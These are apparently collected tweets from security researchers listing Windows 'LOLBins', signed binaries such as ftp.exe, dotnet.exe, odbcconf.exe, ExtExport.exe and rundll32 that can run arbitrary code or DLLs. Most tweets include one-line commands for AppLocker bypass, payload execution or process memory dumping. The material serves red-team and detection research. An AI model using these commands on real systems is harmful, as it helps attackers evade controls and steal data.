-
Today I found out that ftp.exe can be used as a #lolbin. Run ftp.exe, type "!" (calls the shell() function inside ftp.exe) followed by whatever it is that you want to run, i.e. "!powershell". File under: Things that my teammates and I are finding when looking at Windows binaries. pic.twitter.com/JlsyxaolXE
-
For all your #LOLBin needs
Windows: https://lolbas-project.github.io/
Unix: https://gtfobins.github.io/
-
dotnet.exe [PATH_TO_DLL] It's just like doing python script.py. (funny) dotnet.exe is a trusted binary and the default AppLocker rules don't block it, so it's a valid AppLocker bypass. Similar to regasm.exe. CC @egre55 #lolbin
-
Use the MS-signed executable "dvdplay.exe" #lolbin to run your binaries pic.twitter.com/BPozaA4cND
-
I hear you like lolbins... odbcconf.exe /a {REGSVR c:\test\test.dll} it loads the DLL and calls DllRegisterServer :) #LOLBIN
-
how to be a bad ctor http://www.hexacorn.com/blog/2020/01/24/how-to-be-a-bad-ctor/ … ctor.dll, LaunchSetup <filename> #LOLBIN
-
MS signed #lolbin ExtExport accepts UNC paths. Loads DLL from local disk, SMB and WebDav links. 64 and 32 bit bins on disk. .\ExtExport.exe "\\live.sysinternals.com\tools\Autoruns64.dll" a b JSON FIREFOX c Anyone care to test if it has evasive properties? pic.twitter.com/ulmnlfR42E
-
Just published the awaited blog post on the #bitsadmin. It was a fun tool and a pesky #lolbin https://www.hackingarticles.in/windows-for-pentester-bitsadmin/ …
-
Windows 10 1803 has some interesting new binaries. I don't need to explain this picture.... - Well, they are signed at least #LOLBins #LOLBin #DFIR #RedTeam pic.twitter.com/CZyVGQ0PPt
-
SettingSyncHost.exe as a LolBin http://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/ … #LOLBIN cd %TEMP% & c:\windows\system32\SettingSyncHost.exe -LoadAndRunDiagScript foo pic.twitter.com/dOM4EHq4Zu
-
In addition steamservice.exe can call custom .vdf files directly without having to modify any game-specific .vdf's #lolbin pic.twitter.com/OJgsRFdmO9
-
Synaptics Touchpad Enhancements #LOLBIN SynTPEnh.exe “provides additional configurations and support” Okay! Execute my malicious binary for me cc @Oddvarmoe pic.twitter.com/5VR6GhoMPz
-
this looks like a #lolbin (signed by citrix) similar to "setupapi.dll,InstallHinfSection" https://lolbas-project.github.io/lolbas/Libraries/Setupapi/ … u can download citrix exe from https://app.any.run/tasks/d9f62b6f-4ced-407c-9445-1e98fbb523b3/ … pic.twitter.com/kPij10E3YT
-
CML Execution Using DXCap.exe To Launch Executive From Prompt-CML #LoLBin &- DXCap.exe -c C:\Windows\System32\notepad.exe &- Raw https://gist.github.com/homjxi0e/55c91aaa1534df35fc24e48fb237c6d9 … pic.twitter.com/NPnFD0JANN
-
c:\windows\system32\devtoolslauncher.exe LaunchForDeploy payload.exe "argument here" test Trusted binary will execute your payload :) Thanks to @MinatoTW_ & @egriffithCH for testing it on their side. VS or VS Code is required, I think. #lolbin pic.twitter.com/8mmSjSkbhp
-
#Microsoft Office binaries #winword #excel #powerpnt added to #lolbas || #lolbin https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ … https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/ … https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ … Writeup - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 … #blueteam #redteam #dfir #infosec #pentest Thanks to @Oddvarmoe
-
Nice #LoLBin from Steam (Valve) :-p Dump a Windows process with a Valve Signed Binary: WriteMiniDump.exe PID DumpFilePath @Oddvarmoe pic.twitter.com/ow2rWKkOgJ
-
Is Explorer.exe the ultimate #lolbin? explorer.exe [exe/hta/scr/...etc]
*Invokes child processes when called (after a lookup of the default program handler)
*Hides from the default filter in AutoRuns
*Just might be doing a little more on a workstation in your network
#DFIR pic.twitter.com/3YmafQmkqs
-
Stay positive Lolbins... not! http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ … #LOLBIN
rundll32 advpack.dll, RegisterOCX calc.exe
rundll32 advpack.dll, #12 calc.exe
rundll32 advpack.dll, #+12 calc.exe
rundll32 advpack.dll, #-4294967284 calc.exe